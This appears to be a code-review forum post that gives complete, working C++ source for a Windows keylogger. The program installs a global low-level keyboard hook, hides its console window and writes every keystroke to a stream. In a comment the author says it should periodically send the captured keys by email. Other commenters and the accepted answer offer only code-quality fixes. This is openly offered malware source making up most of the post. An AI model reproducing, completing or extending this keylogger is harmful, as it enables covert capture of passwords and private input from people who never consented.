# Windows keylogger in C++

Tags: c++, beginner, event-handling, windows, winapi

### Windows keylogger in C++

**Known issues:**

1. Not implementing rule of five
2. Having to use hack to use member variables, `out_`, in static method
3. Pressing caps-lock won't capitalize letters (I will fix this later)

---

**keylogger.h**

```
#pragma once
#include <string>
#include <Windows.h>

class keylogger
{
public:
    keylogger(std::ostream* out);
    ~keylogger();

    void run() const;
    void hide_window() const;
    void show_window() const;
private:
    void hook();
    void unhook() const;

    static LRESULT CALLBACK hook_process(int code, WPARAM wparam, LPARAM lparam);
    static keylogger* this_;

    HHOOK hhok_;
    std::ostream* out_;
};
```

**keylogger.cpp**

```
#include "keylogger.h"

keylogger* keylogger::this_ = NULL;

keylogger::keylogger(std::ostream* out)
    : out_(out)
{
    this_ = this;
    hook();
}

keylogger::~keylogger()
{
    unhook();
}

void keylogger::run() const
{
    MSG msg = { 0 };
    while (GetMessage(&msg, NULL, 0, 0) > 0)
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
}

void keylogger::hide_window() const
{
    ShowWindow(GetConsoleWindow(), SW_HIDE);
}

void keylogger::show_window() const
{
    ShowWindow(GetConsoleWindow(), SW_SHOW);
}

void keylogger::hook()
{
    hhok_ = SetWindowsHookEx(WH_KEYBOARD_LL, hook_process, NULL, 0);
}

void keylogger::unhook() const
{
    UnhookWindowsHookEx(hhok_);
}

LRESULT CALLBACK keylogger::hook_process(int code, WPARAM wparam, LPARAM lparam)
{
    if (code == HC_ACTION)
    {
        std::string key;
        KBDLLHOOKSTRUCT* kbs = (KBDLLHOOKSTRUCT*)lparam;
        if (wparam == WM_KEYDOWN || wparam == WM_SYSKEYDOWN)
        {
            bool shift_down = GetAsyncKeyState(VK_SHIFT);
            switch (kbs->vkCode)
            {
            case 0x08: key = "[BACKSPACE]"; break;
            case 0x09: key = "[TAB]";       break;
            case 0x0D: key = "[NEWLINE]";   break;
            case 0x13: key = "[PAUSE]";     break;
            case 0x14: key = "[CAPS LOCK]"; break;
            case 0x20: key = "[SPACE]";     break;
            case 0x25: key = "[LEFT]";      break;
            case 0x26: key = "[UP]";        break;
            case 0x27: key = "[RIGHT]";     break;
            case 0x28: key = "[DOWN]";      break;
            case 0x2E: key = "[DELETE]";    break;
            case 0x30: (!shift_down) ? key = "0" : key = ")";   break;
            case 0x31: (!shift_down) ? key = "1" : key = "!";   break;
            case 0x32: (!shift_down) ? key = "2" : key = "@";   break;
            case 0x33: (!shift_down) ? key = "3" : key = "#";   break;
            case 0x34: (!shift_down) ? key = "4" : key = "$";   break;
            case 0x35: (!shift_down) ? key = "5" : key = "%";   break;
            case 0x36: (!shift_down) ? key = "6" : key = "^";   break;
            case 0x37: (!shift_down) ? key = "7" : key = "&";   break;
            case 0x38: (!shift_down) ? key = "8" : key = "*";   break;
            case 0x39: (!shift_down) ? key = "9" : key = "(";   break;
            case 0x41: (!shift_down) ? key = "a" : key = "A";   break;
            case 0x42: (!shift_down) ? key = "b" : key = "B";   break;
            case 0x43: (!shift_down) ? key = "c" : key = "C";   break;
            case 0x44: (!shift_down) ? key = "d" : key = "D";   break;
            case 0x45: (!shift_down) ? key = "e" : key = "E";   break;
            case 0x46: (!shift_down) ? key = "f" : key = "F";   break;
            case 0x47: (!shift_down) ? key = "g" : key = "G";   break;
            case 0x48: (!shift_down) ? key = "h" : key = "H";   break;
            case 0x49: (!shift_down) ? key = "i" : key = "I";   break;
            case 0x4A: (!shift_down) ? key = "j" : key = "J";   break;
            case 0x4B: (!shift_down) ? key = "k" : key = "K";   break;
            case 0x4C: (!shift_down) ? key = "l" : key = "L";   break;
            case 0x4D: (!shift_down) ? key = "m" : key = "M";   break;
            case 0x4E: (!shift_down) ? key = "n" : key = "N";   break;
            case 0x4F: (!shift_down) ? key = "o" : key = "O";   break;
            case 0x50: (!shift_down) ? key = "p" : key = "P";   break;
            case 0x51: (!shift_down) ? key = "q" : key = "Q";   break;
            case 0x52: (!shift_down) ? key = "r" : key = "R";   break;
            case 0x53: (!shift_down) ? key = "s" : key = "S";   break;
            case 0x54: (!shift_down) ? key = "t" : key = "T";   break;
            case 0x55: (!shift_down) ? key = "u" : key = "U";   break;
            case 0x56: (!shift_down) ? key = "v" : key = "V";   break;
            case 0x57: (!shift_down) ? key = "w" : key = "W";   break;
            case 0x58: (!shift_down) ? key = "x" : key = "X";   break;
            case 0x59: (!shift_down) ? key = "y" : key = "Y";   break;
            case 0x5A: (!shift_down) ? key = "z" : key = "Z";   break;
            case 0x60: (!shift_down) ? key = "0" : key = "0";   break;
            case 0x61: (!shift_down) ? key = "1" : key = "1";   break;
            case 0x62: (!shift_down) ? key = "2" : key = "2";   break;
            case 0x63: (!shift_down) ? key = "3" : key = "3";   break;
            case 0x64: (!shift_down) ? key = "4" : key = "4";   break;
            case 0x65: (!shift_down) ? key = "5" : key = "5";   break;
            case 0x66: (!shift_down) ? key = "6" : key = "6";   break;
            case 0x67: (!shift_down) ? key = "7" : key = "7";   break;
            case 0x68: (!shift_down) ? key = "8" : key = "8";   break;
            case 0x69: (!shift_down) ? key = "9" : key = "9";   break;
            case 0x6A: (!shift_down) ? key = "*" : key = "*";   break;
            case 0x6B: (!shift_down) ? key = "+" : key = "+";   break;
            case 0x6D: (!shift_down) ? key = "-" : key = "-";   break;
            case 0x6E: (!shift_down) ? key = "." : key = ".";   break;
            case 0x6F: (!shift_down) ? key = "/" : key = "/";   break;
            case 0xBA: (!shift_down) ? key = ";" : key = ":";   break;
            case 0xBB: (!shift_down) ? key = "=" : key = "+";   break;
            case 0xBC: (!shift_down) ? key = "," : key = "<";   break;
            case 0xBD: (!shift_down) ? key = "-" : key = "_";   break;
            case 0xBE: (!shift_down) ? key = "." : key = ">";   break;
            case 0xBF: (!shift_down) ? key = "/" : key = "?";   break;
            case 0xC0: (!shift_down) ? key = "`" : key = "~";   break;
            case 0xDB: (!shift_down) ? key = "[" : key = "{";   break;
            case 0xDC: (!shift_down) ? key = "\\" : key = "|";  break;
            case 0xDD: (!shift_down) ? key = "]" : key = "}";   break;
            case 0xDE: (!shift_down) ? key = "'" : key = "\"";  break;
            }
        }
        *(this_->out_) << key;
    }
    return CallNextHookEx(NULL, code, wparam, lparam);
}
```

Comment: Are there keyboard scan codes or just actual ASCII codes? If the latter it's better to just interpret the `vkCode` as `char` (calling `toupper`-like function if needed), without a lot of `case-break` labels (which is very error-prone because the `break` is easy to forget, leaving a fallthrough)

Comment: @trolley813 It's not ASCII, but `0x41` to `0x5A` matches all uppercase letters from A-Z in the ASCII table. So that's a great idea.

Comment: Even if it isn't it may be good to write a conversion function (which can be far easier because 0x41 to 0x5a (and 0x30 to 0x39) match to the corresponding ranges in ASCII)

Comment: I'm wondering how the `keylogger` class is being used... is it created and used in a `main` function?

Comment: @TrebledJ yes, you just create an instance passing it an `std::ostream`, and call run. This should be threaded, so you can periodically send to email, etc.

Comment: Parts of your code are missing, which may be part of the cause why your question hasn't received reviews yet. More context => better questions => more/better reviews.

Answer (score 1, accepted):

It's an old review, but I tried the code out, so, some pointers:

- `keylogger.h` is missing `#include <ostream>` - your code is not complete without it.
- Instantiating the `keylogger` with a pointer to an `ostream` without checking for `nullptr` is unsafe. Take it by reference instead. You can still store a pointer though.
- Every `keylogger` instance will overwrite the `static` `this_` and `this_->out_` will be used for output instead of using the `ostream` that was supplied when constructing the `keylogger` instance. This is very confusing for a user. Either:

  1. If only one `ostream` is supposed to be used, make `keylogger` a proper singleton.
  2. Install a unique hook for each thread (set `dwThreadId` to `GetCurrentThreadId()`) and make `out_` a `static thread_local` instead.
- The `keylogger` doesn't stop its `run()` loop when the `keylogger` goes out of scope. It should probably be self-installing and uninstalling itself when going out of scope. Something is left unhandled in that department.
- The return value from `SetWindowsHookEx` isn't checked - `throw` if installing the hook fails.

Those are just some things to deal with to improve the logger a bit.